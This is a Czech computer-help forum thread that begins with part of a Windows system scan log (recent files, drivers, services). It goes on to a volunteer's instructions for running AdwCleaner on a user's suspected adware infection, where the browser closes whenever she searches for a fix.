.js - open - C:\Windows\System32\WScript.exe "%1" %*

======List of files/folders created in the last 1 month======

2018-08-25 18:56:57 ----D---- C:\rsit
2018-08-25 18:56:57 ----D---- C:\Program Files\trend micro
2018-08-25 11:52:55 ----D---- C:\Windows\{2E03268B-4782-44EF-B29B-44B65D240959}
2018-08-23 10:05:20 ----D---- C:\Program Files\Common Files\DESIGNER
2018-08-22 16:14:23 ----D---- C:\Windows\{386B5B3F-9B0C-4C98-A35A-9D30F4B40497}
2018-08-15 16:29:03 ----D---- C:\Users\eciO\AppData\Roaming\LibreOffice
2018-08-15 15:32:24 ----A---- C:\Windows\SYSWOW64\mshtml.dll
2018-08-15 15:32:24 ----A---- C:\Windows\system32\mshtml.dll
2018-08-15 15:32:23 ----A---- C:\Windows\SYSWOW64\ieframe.dll
2018-08-15 15:32:23 ----A---- C:\Windows\system32\wininet.dll
2018-08-15 15:32:23 ----A---- C:\Windows\system32\jscript9.dll
2018-08-15 15:32:23 ----A---- C:\Windows\system32\ieframe.dll
2018-08-15 15:32:22 ----A---- C:\Windows\SYSWOW64\wininet.dll
2018-08-15 15:32:22 ----A---- C:\Windows\SYSWOW64\msi.dll
2018-08-15 15:32:22 ----A---- C:\Windows\SYSWOW64\jscript9.dll
2018-08-15 15:32:22 ----A---- C:\Windows\SYSWOW64\iertutil.dll
2018-08-15 15:32:22 ----A---- C:\Windows\system32\win32k.sys
2018-08-15 15:32:22 ----A---- C:\Windows\system32\urlmon.dll
2018-08-15 15:32:22 ----A---- C:\Windows\system32\ntoskrnl.exe
2018-08-15 15:32:22 ----A---- C:\Windows\system32\drivers\tcpip.sys
2018-08-15 15:32:22 ----A---- C:\Windows\system32\authui.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\webcheck.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\vbscript.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\urlmon.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\t2embed.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\StructuredQuery.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\msiexec.exe
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\msfeeds.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\jscript.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\ieapfltr.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\hlink.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\GdiPlus.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\fontsub.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\win32spl.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\vbscript.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\StructuredQuery.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\samsrv.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\puiobj.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\ntdll.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\msiexec.exe
2018-08-15 15:32:21 ----A---- C:\Windows\system32\msi.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\msfeeds.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\jscript.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\iertutil.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\ieapfltr.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\hlink.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\GdiPlus.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\fontsub.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\drivers\refs.sys
2018-08-15 15:32:21 ----A---- C:\Windows\system32\drivers\ndis.sys
2018-08-15 15:32:21 ----A---- C:\Windows\system32\drivers\dxgkrnl.sys
2018-08-15 15:32:21 ----A---- C:\Windows\system32\drivers\appid.sys
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\jscript9diag.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\inetcomm.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\iedkcs32.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\certcli.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\authui.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\actxprxy.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\webcheck.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\t2embed.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\jscript9diag.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\inseng.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\inetcomm.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\ieui.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\ie4uinit.exe
2018-08-15 15:32:20 ----A---- C:\Windows\system32\dpapisrv.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\certcli.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\actxprxy.dll
2018-08-15 15:16:45 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-12 11:18:44 ----D---- C:\Users\eciO\AppData\Roaming\Unreal Engine
2018-08-10 15:50:01 ----D---- C:\Windows\{6CD4963C-603E-45BC-A07A-EB9A6137CC9A}
2018-08-08 17:59:13 ----D---- C:\FRST
2018-08-07 08:35:19 ----D---- C:\Windows\{9313CB30-7832-4851-AF74-A21456C4EF2A}
2018-08-06 09:14:14 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
2018-08-05 21:18:39 ----D---- C:\Windows\SYSWOW64\D374-4DEA-9751-2D08BC721AA7}
2018-08-05 21:09:05 ----D---- C:\Games
2018-08-05 21:01:50 ----D---- C:\Users\eciO\AppData\Roaming\Easeware
2018-08-05 20:02:41 ----A---- C:\Windows\system32\drivers\aswHdsKe.sys
2018-08-05 20:02:39 ----A---- C:\Windows\system32\aswBoot.exe
2018-08-05 19:48:02 ----D---- C:\Users\eciO\AppData\Roaming\uTorrent
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\vcruntime140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\vccorlib140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\msvcp140_1.dll
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\msvcp140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\concrt140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\vcruntime140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\vccorlib140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\msvcp140_1.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\msvcp140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\concrt140.dll

======List of files/folders modified in the last 1 month======

2018-08-25 18:57:02 ----D---- C:\Windows\Prefetch
2018-08-25 18:56:57 ----RD---- C:\Program Files
2018-08-25 18:50:00 ----D---- C:\Windows\Temp
2018-08-25 18:00:00 ----D---- C:\Windows\system32\sru
2018-08-25 17:50:12 ----D---- C:\Windows\SysWOW64
2018-08-25 17:50:02 ----SHD---- C:\Windows\Installer
2018-08-25 17:50:02 ----SHD---- C:\Config.Msi
2018-08-25 14:25:52 ----RD---- C:\Windows\System32
2018-08-25 14:25:52 ----D---- C:\Windows\Inf
2018-08-25 14:25:52 ----A---- C:\Windows\system32\PerfStringBackup.INI
2018-08-25 14:19:47 ----D---- C:\ProgramData\NVIDIA
2018-08-25 14:09:35 ----D---- C:\Program Files\Microsoft Office
2018-08-25 12:25:55 ----D---- C:\Windows\Microsoft.NET
2018-08-25 11:52:55 ----D---- C:\Windows
2018-08-24 21:52:06 ----D---- C:\Users\eciO\AppData\Roaming\TS3Client
2018-08-24 16:02:48 ----D---- C:\Windows\system32\drivers
2018-08-24 11:55:09 ----SHD---- C:\System Volume Information
2018-08-23 12:02:46 ----D---- C:\Windows\system32\Tasks
2018-08-23 10:05:31 ----D---- C:\ProgramData\regid.1991-06.com.microsoft
2018-08-23 10:05:20 ----D---- C:\Program Files\Common Files\microsoft shared
2018-08-23 10:05:20 ----D---- C:\Program Files\Common Files
2018-08-22 16:14:03 ----D---- C:\Program Files (x86)\Overwolf
2018-08-21 10:48:10 ----D---- C:\Windows\system32\config
2018-08-20 14:09:49 ----D---- C:\Windows\WinSxS
2018-08-20 14:07:24 ----D---- C:\Windows\system32\catroot2
2018-08-20 14:04:11 ----D---- C:\Windows\system32\DriverStore
2018-08-19 22:05:37 ----D---- C:\Windows\system32\wdi
2018-08-19 12:00:32 ----D---- C:\Windows\rescache
2018-08-19 12:00:31 ----RSD---- C:\Windows\assembly
2018-08-15 21:16:33 ----RD---- C:\Windows\ToastData
2018-08-15 21:16:33 ----D---- C:\Windows\SYSWOW64\cs-CZ
2018-08-15 21:16:33 ----D---- C:\Windows\system32\cs-CZ
2018-08-15 21:16:33 ----D---- C:\Program Files\Internet Explorer
2018-08-15 21:16:33 ----D---- C:\Program Files (x86)\Internet Explorer
2018-08-15 21:16:32 ----D---- C:\Windows\apppatch
2018-08-15 16:28:39 ----D---- C:\Users\eciO\AppData\Roaming\Seznam.cz
2018-08-15 16:28:08 ----RSD---- C:\Windows\Fonts
2018-08-15 15:49:30 ----D---- C:\Windows\CbsTemp
2018-08-15 15:49:00 ----D---- C:\Windows\system32\MRT
2018-08-15 15:48:04 ----D---- C:\Windows\debug
2018-08-15 15:48:01 ----AC---- C:\Windows\system32\MRT.exe
2018-08-14 08:53:13 ----D---- C:\Windows\AppReadiness
2018-08-12 18:34:40 ----D---- C:\Users\eciO\AppData\Roaming\vlc
2018-08-12 11:18:35 ----D---- C:\Windows\Logs
2018-08-12 11:18:33 ----D---- C:\ProgramData\Package Cache
2018-08-11 19:27:32 ----D---- C:\Program Files\Epic Games
2018-08-09 11:54:05 ----D---- C:\Windows\SoftwareDistribution
2018-08-08 17:18:26 ----D---- C:\Windows\Panther
2018-08-08 17:18:26 ----D---- C:\Windows\Minidump
2018-08-08 17:13:21 ----D---- C:\Windows\Tasks
2018-08-08 17:13:05 ----D---- C:\ProgramData\ProductData
2018-08-08 17:05:53 ----D---- C:\AdwCleaner
2018-08-08 13:43:21 ----RD---- C:\Program Files (x86)
2018-08-08 13:43:21 ----D---- C:\ProgramData\AVAST Software
2018-08-06 10:20:55 ----D---- C:\Program Files\WinRAR
2018-08-05 19:54:52 ----HD---- C:\Program Files\WindowsApps
2018-08-04 01:46:42 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2018-07-19 201328]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2018-07-19 346664]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2018-07-19 59592]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2018-07-19 85968]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-07-19 381584]
R0 iaStorA;iaStorA; C:\Windows\System32\drivers\iaStorA.sys [2017-08-14 1467912]
R1 aswArPot;aswArPot; C:\Windows\system32\drivers\aswArPot.sys [2018-07-19 197160]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2018-07-19 229392]
R1 aswHdsKe;aswHdsKe; C:\Windows\system32\drivers\aswHdsKe.sys [2018-08-05 239680]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2018-07-19 111872]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2018-07-19 1027728]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2018-08-24 465640]
R1 HWiNFO32;HWiNFO32/64 Kernel Driver; \??\C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [2017-08-14 27552]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2018-07-19 159640]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2018-07-19 211160]
R3 ETDSMBus;ETDSMBus; C:\Windows\System32\drivers\ETDSMBus.sys [2017-08-14 32840]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\Windows\system32\drivers\RTKVHD64.sys [2014-12-03 4290520]
R3 ISCT;@oem9.inf,%ISCT.DeviceDesc%;Intel(R) Smart Connect Technology Device Driver; C:\Windows\System32\drivers\ISCTD.sys [2017-08-14 44744]
R3 MEIx64;@oem13.inf,%TEE_SvcDesc%;Intel(R) Management Engine Interface ; C:\Windows\System32\drivers\TeeDriverW8x64.sys [2017-08-14 204920]
R3 NVHDA;@oem29.inf,%NVHDA.SvcDesc%;Service for NVIDIA High Definition Audio Driver; C:\Windows\system32\drivers\nvhda64v.sys [2017-11-09 233904]
R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2017-11-09 16771696]
R3 NVVADARM;@oem31.inf,%NVVADARM.SvcDesc%;NVIDIA Miracast Audio; C:\Windows\system32\drivers\nvvadarm.sys [2017-11-09 54896]
R3 RTL8168;@oem21.inf,%rtl8168.Service.DispName%;Realtek 8168 NT Driver; C:\Windows\system32\DRIVERS\Rt630x64.sys [2014-08-26 874712]
S3 ArcSoftKsUFilter;ArcSoft Magic-I Visual Effect; C:\Windows\system32\DRIVERS\ArcSoftKsUFilter.sys [2008-04-03 19968]
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2018-07-19 46976]
S3 cpuz140;cpuz140; \??\C:\Users\eciO\AppData\Local\Temp\cpuz140\cpuz140_x64.sys []
S3 dg_ssudbus;@oem23.inf,%ssud.Service.DeviceDesc%;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudbus.sys [2017-05-18 131984]
S3 MSICDSetup;MSICDSetup; \??\E:\CDriver64.sys []
S3 NTIOLib_1_0_C;NTIOLib_1_0_C; \??\E:\NTIOLib_X64.sys []
S3 ssudmdm;@oem24.inf,%ssud.Service.Name%;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudmdm.sys [2017-05-18 166288]
S3 usbaudio;@wdma_usb.inf,%USBAudio.SvcDesc%;Ovladač zvuků USB (WDM); C:\Windows\system32\drivers\usbaudio.sys [2014-03-18 121088]
S3 usbvideo;@usbvideo.inf,%USBVideo.SvcDesc%;Zobrazovací zařízení USB (WDM); C:\Windows\System32\Drivers\usbvideo.sys [2014-06-21 212736]
S3 WinUsb;@wpdmtp.inf,%WinUsb.SvcDesc%;WinUsb; C:\Windows\system32\DRIVERS\WinUsb.sys [2015-10-10 78848]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2017-03-28 82640]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-07-19 322464]
R2 ClickToRunSvc;Microsoft Office Click-to-Run Service; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2018-08-19 9644000]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2014-10-29 38792]
R2 MSI_Trigger_Service;MSI_Trigger_Service; C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe [2013-09-26 30240]
R2 NVDisplay.ContainerLocalSystem;NVIDIA Display Container LS; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [2017-10-27 462968]
R2 NvTelemetryContainer;NVIDIA Telemetry Container; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [2017-08-14 449984]
R2 uCamMonitor;CamMonitor; C:\Program Files (x86)\ArcSoft\Magic-i Visual Effects 2\uCamMonitor.exe [2011-07-15 106496]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2018-07-19 7780400]
R3 Steam Client Service;Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [2018-08-09 1683744]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-14 107848]
S3 ACDaemon;ArcSoft Connect Daemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [2010-03-18 113152]
S3 BEService;BattlEye Service; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [2018-06-19 6875688]
S3 BthHFSrv;@%SystemRoot%\System32\BthHFSrv.dll,-103; C:\Windows\System32\svchost.exe [2014-10-29 38792]
S3 EasyAntiCheat;EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [2018-03-08 774272]
S3 FontCache3.0.0.0;@%SystemRoot%\system32\PresentationHost.exe,-3309; C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe [2013-08-03 43696]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-14 107848]
S3 ose64;Office 64 Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2018-07-30 261200]
S3 OverwolfUpdater;Overwolf Updater Windows SCM; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2018-08-15 2308424]
S3 uSHAREitSvc;SHAREit Hotspot Service; C:\Program Files (x86)\SHAREit Technologies\SHAREit\SHAREit.Service.exe [2017-09-11 33224]

-----------------EOF-----------------

[Rudy]

Zdravím!
Spusťte tuto utilitu:

Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi

[Kate34]

Taky zdravím a děkuju,

ani jeden z odkazů nefuguje (prohlížeč se zavře a naskočí hláška, že aplikace google nebyla řádně ukončena..). V PC mám adw cleaner, ale jak jsem teď zjistila, nejde spustit, ani dvojklikem, ani přes "otevřít", naběhne znovu plocha. Funkci spustit jako správce ve svém adwcleaneru nevidím. Dál teď zjišťuju, že i při zadání slova adware do vyhledávače mě to vyhodí zpět na plochu. Prohlížeč se zavře.

[Rudy]

Odkazy fungují (zkoušel jsem), zkuste jiný prohlížeč. Např. IE.

[Kate34]

Nejde, ani v IE. I tak děkuju za snahu, pozvu někoho domů, ať si k tomu sedne.

Hezký večer Kateřina

[Rudy]

Zkuste tento:

adwcleaner_6.043.rar

(3.75 MiB) Staženo 68 x

Dotaz na stažení novější verze ignorujte.